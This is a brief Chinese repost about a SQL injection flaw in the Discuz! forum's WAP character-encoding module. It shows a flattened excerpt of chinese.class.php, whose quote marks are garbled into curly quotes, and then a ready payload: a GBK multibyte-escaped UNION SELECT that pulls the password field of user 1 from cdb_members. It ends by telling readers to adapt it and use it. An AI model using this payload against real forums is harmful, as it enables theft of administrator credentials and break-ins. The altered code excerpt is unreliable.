Discuz!论坛wap功能模块编码的注射漏洞[转]

if(defined('IN_DISCUZ')) {exit('Access Denied');}define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/');class Chinese {var $table = '';var $iconv_enabled = false;var $unicode_table = array();var $config = array('SourceLang' => '','TargetLang' => '','GBtoUnicode_table' => 'gb-unicode.table','BIG5toUnicode_table' => 'big5-unicode.table',);function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {$this->config['SourceLang'] = $this->_lang($SourceLang);$this->config['TargetLang'] = $this->_lang($TargetLang);if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {$this->iconv_enabled = true;} else {$this->iconv_enabled = false;$this->OpenTable();}}function _lang($LangCode) {$LangCode = strtoupper($LangCode);if(substr($LangCode, 0, 2) == ‘GB’) {return ‘GBK’;} elseif(substr($LangCode, 0, 3) == ‘BIG’) {return ‘BIG5′;} elseif(substr($LangCode, 0, 3) == ‘UTF’) {return ‘UTF-8′;} elseif(substr($LangCode, 0, 3) == ‘UNI’) {return ‘UNICODE’;}}function _hex2bin($hexdata) {for($i=0; $i < strlen($hexdata); $i += 2) {$bindata .= chr(hexdec(substr($hexdata, $i, 2)));}return $bindata;}chinese.class.php (utf-8不能利用)searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit以上各位自己修改去用吧!